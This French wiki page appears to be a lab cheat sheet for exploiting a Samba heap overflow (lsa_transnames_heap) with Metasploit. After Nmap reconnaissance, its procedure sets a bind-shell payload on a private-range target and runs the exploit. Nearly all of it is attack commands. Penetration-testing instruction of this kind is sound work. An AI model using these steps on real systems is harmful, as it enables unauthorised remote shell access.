Ubuntu metasploit
Aller à la navigation
Aller à la recherche
| Fiche express | |
|---|---|
| Domaine | Exploitation Linux (Samba) |
| Module | linux/samba/lsa_transnames_heap
|
| Reconnaissance | nmap -sT -A
|
| Voir aussi | Samba anonyme · Vsftp backdoor |
Exploitation d'une faille Samba (débordement de tas lsa_transnames_heap) sur une cible Linux, après reconnaissance Nmap.
Procédure
nmap -sT -A -p0 192.168.0.20
search samba
use linux/samba/lsa_transnames_heap
show payloads
set payload linux/x86/shell_bind_tcp
set LPORT 8080
set RHOST 192.168.0.20
exploit
ifconfig
Voir aussi
- Samba anonyme — traversée par lien symbolique Samba
- Vsftp backdoor — backdoor vsftpd 2.3.4